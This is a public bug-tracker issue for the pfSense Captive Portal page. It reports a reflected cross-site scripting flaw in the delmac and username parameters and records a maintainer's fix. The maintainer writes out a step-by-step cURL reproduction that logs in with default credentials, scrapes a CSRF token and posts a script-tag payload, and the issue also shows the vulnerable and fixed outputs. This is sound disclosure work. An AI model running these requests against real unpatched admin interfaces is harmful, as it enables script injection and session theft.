Project

General

Profile

Actions

Bug #9609

closed

Reflective xss in services_captiveportal_mac.php

Added by LoRexxar Romer over 5 years ago. Updated over 4 years ago.

Status:
Resolved
Priority:
Normal
Assignee:
Category:
Captive Portal
Target version:
Start date:
07/01/2019
Due date:
% Done:

100%

Estimated time:
Plus Target Version:
Release Notes:
Affected Version:
All
Affected Architecture:
All

Description

in `services_captiveportal_mac.php` parameter username and parameter delmac be displayed without any filter.

you can use payload such as:

```
__csrf_magic={csrf_code}&save=1&postafterlogin=1&delmac=<script>alert(1)</script>
```

Actions #1

Updated by Jim Pingle over 5 years ago

  • Private changed from No to Yes
Actions #2

Updated by Jim Pingle over 5 years ago

  • Category set to Captive Portal
  • Assignee set to Jim Pingle
  • Target version set to 2.5.0
  • Affected Version set to All
  • Affected Architecture All added
  • Affected Architecture deleted ()

I was able to replicate the problem, but there are a couple notable exceptions left out above:

1. There must be at least one Captive Portal zone defined
2. The attacker must know the name of a valid Captive Portal zone
3. There must be at least one pass-through MAC entry defined

To reproduce with cURL:

1. Login:

curl -L -k --cookie-jar cookies.txt \
   https://192.168.1.1/ \
   | grep "name='__csrf_magic'" \
   | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   --data-urlencode "login=Login" \
   --data-urlencode "usernamefld=admin" \
   --data-urlencode "passwordfld=pfsense" \
   --data-urlencode "__csrf_magic=$(cat csrf.txt)" \
   https://192.168.1.1/ > /dev/null

2. Fetch a CSRF token:

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   "https://192.168.1.1/services_captiveportal_mac_edit.php?zone=myzone&id=1" \
     | grep "name='__csrf_magic'"   \
     | sed 's/.*value="\(.*\)".*/\1/' > csrf.txt

3a. Exploit via delmac:

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   --data-urlencode "zone=myzone" \
   --data-urlencode "save=1" \
   --data-urlencode "postafterlogin=1" \
   --data-urlencode "delmac=<script>alert(1)</script>" \
   --data-urlencode "__csrf_magic=$(head -n 1 csrf.txt)" \
   https://192.168.1.1/services_captiveportal_mac.php | grep alert
No entry exists for this mac address: <script>alert(1)</script>

3b. Exploit via username:

curl -L -k --cookie cookies.txt --cookie-jar cookies.txt \
   --data-urlencode "zone=myzone" \
   --data-urlencode "save=1" \
   --data-urlencode "postafterlogin=1" \
   --data-urlencode "username=<script>alert(1)</script>" \
   --data-urlencode "__csrf_magic=$(head -n 1 csrf.txt)" \
   https://192.168.1.1/services_captiveportal_mac.php | grep alert
No entry exists for this username: <script>alert(1)</script>

Actions #3

Updated by Jim Pingle over 5 years ago

  • Status changed from New to Feedback
  • % Done changed from 0 to 100
Actions #4

Updated by Jim Pingle about 5 years ago

  • Target version changed from 2.5.0 to 2.4.5
Actions #5

Updated by Jim Pingle almost 5 years ago

  • Status changed from Feedback to Resolved

Looks good here. Re-verified against 2.4.4-p3 and confirmed fixed against 2.4.5 and 2.5.0:

2.4.4-p3:

No entry exists for this mac address: <script>alert(1)</script>
No entry exists for this username: <script>alert(1)</script>

2.4.5:

No entry exists for this mac address: &lt;script&gt;alert(1)&lt;/script&gt;
No entry exists for this username: &lt;script&gt;alert(1)&lt;/script&gt;

2.5.0:

No entry exists for this mac address: &lt;script&gt;alert(1)&lt;/script&gt;
No entry exists for this username: &lt;script&gt;alert(1)&lt;/script&gt;

Actions #6

Updated by Jim Pingle over 4 years ago

  • Private changed from Yes to No
Actions #7

Updated by LoRexxar Romer over 4 years ago

Hello,

I request the CVEID CVE-2019-16914.

and my id is LoRexxar@knownsec 404team.

I hope to change my id to this in public information in https://www.netgate.com/assets/downloads/advisories/pfSense-SA-20_03.webgui.asc

Thanks.

Actions

Also available in: Atom PDF